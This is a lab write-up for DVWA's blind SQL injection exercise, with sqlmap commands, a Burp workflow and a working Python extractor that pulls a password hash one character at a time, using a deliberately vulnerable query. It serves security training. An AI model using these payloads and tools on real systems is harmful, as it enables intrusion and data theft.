DVWA Exercises 6

13 Blind SQL Injection

In contrast to a regular (error-based or UNION-based) SQL injection, a blind SQL injection returns no query output at all: each request only reveals a single true/false answer, either through a difference in the page content (boolean-based) or in the response time (time-based). Because a value has to be reconstructed one bit at a time, exfiltrating even a short string takes hundreds or even thousands of requests, so automated tools are used. Some people write their own, but most use sqlmap. Fortunately, it has already been installed for you and is ready for use.

Let's try sqlmap:

sqlmap --cookie='PHPSESSID=<your-session-id>' -u '<your-vulnerable-url>'

To find the session id cookie, type document.cookie in the browser's developer-tools console. Note that document.cookie only lists cookies set without the HttpOnly flag; if PHPSESSID does not show up there, read it from the Storage/Application tab of the developer tools or from Burp's proxy history instead.

First I tried the following parameters:

sqlmap -u "http://172.17.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=37dpblqjrhknhc5pi08k916g21; security=low" --data="id=1&Submit=Submit" -p "id" --dbs --level=5 --risk=3

I didn't have success with this one. For some reason it said the parameter id is not injectable!
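To make the bit-at-a-time exfiltration concrete, here is an added example that is not part of the original page or of DVWA: a boolean-based blind extractor in Python. It binary-searches first the length and then each character of a chosen subquery, asking only "does a row come back?" on every request. The HTTP oracle at the top targets DVWA's sqli_blind page and is an assumption about its markers (the "User ID exists in the database" string, the GET parameters id and Submit); note that the low-security page reads id from the GET query string, so a POST body (what sqlmap's --data option tests) never reaches the vulnerable query. Because the example has to run offline, it also ships a local stand-in oracle built on sqlite with a constructed users table that copies DVWA's concatenation bug; against the real MySQL backend you would pass charfn="ASCII" (or "ORD") instead of sqlite's unicode().

```python
import sqlite3
import urllib.parse
import urllib.request


def http_oracle(url, cookies):
    """Real oracle against DVWA's sqli_blind page (assumed URL and cookie
    string, e.g. 'PHPSESSID=...; security=low'); not exercised offline."""
    def ask(id_value):
        # id is a GET parameter on the low-security page, so it goes in the
        # query string, not in a POST body.
        query = urllib.parse.urlencode({"id": id_value, "Submit": "Submit"})
        req = urllib.request.Request(f"{url}?{query}", headers={"Cookie": cookies})
        with urllib.request.urlopen(req) as resp:
            return b"User ID exists in the database" in resp.read()
    return ask


class LocalBlindOracle:
    """Offline stand-in for DVWA's low-level sqli_blind page: the id value is
    concatenated straight into the query and the only observable result is
    whether a row came back. Sample rows are constructed for this example."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,
                                user TEXT, password TEXT);
            INSERT INTO users VALUES (1, 'admin', 'admin', 'admin',
                                      '5f4dcc3b5aa765d61d8327deb882cf99');
            INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb',
                                      'e99a18c428cb38d5f260853678922e03');
        """)
        self.requests = 0  # count of "HTTP requests" the extraction needed

    def __call__(self, id_value):
        self.requests += 1
        # Deliberately vulnerable: the same string concatenation as DVWA low.php
        sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{id_value}';"
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error:
            return False      # DVWA also reports "MISSING" when the query errors
        return len(rows) > 0  # "User ID exists in the database."


def ask_gt(oracle, expr, threshold):
    """One yes/no question: the row only comes back if expr > threshold.
    The trailing '-- ' comments out the closing quote of the original query
    and is accepted by both MySQL and sqlite."""
    return oracle(f"1' AND ({expr}) > {threshold} -- ")


def binary_search(oracle, expr, lo, hi):
    """Return the integer value of expr, assumed to lie in [lo, hi], using
    about log2(hi - lo) requests instead of one request per candidate."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_gt(oracle, expr, mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, subquery, charfn="ASCII", max_len=64):
    """Recover the string returned by subquery one character at a time.
    charfn is the DBMS function mapping a character to its code point:
    ASCII/ORD on MySQL, unicode on sqlite."""
    length = binary_search(oracle, f"length(({subquery}))", 0, max_len)
    result = ""
    for pos in range(1, length + 1):
        code = binary_search(oracle, f"{charfn}(substr(({subquery}),{pos},1))", 0, 127)
        result += chr(code)
    return result


if __name__ == "__main__":
    oracle = LocalBlindOracle()
    secret = extract(oracle, "SELECT password FROM users WHERE user = 'admin'",
                     charfn="unicode")
    print(f"admin password hash: {secret} ({oracle.requests} requests)")
```

Each binary search costs at most 7 requests, so a 32-character MD5 hash comes out in roughly 230 requests; a naive one-request-per-candidate scan of 128 values per position would need about 4000, which is why the manual approach is impractical and why sqlmap's threading matters.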

Let's start Burp and catch the GET request when submitting an ID.

In Burp I'll modify the GET request, set the parameter ?id=1 to ?id=1* and save the whole request to a file.

sqlmap -r blind_sql --threads=10 -f --dbs --tables

Here -r loads the saved raw request and the asterisk marks the custom injection point for sqlmap, -f fingerprints the back-end DBMS, --threads=10 runs the requests in parallel, and --dbs and --tables enumerate the databases and their tables once the injection is confirmed.
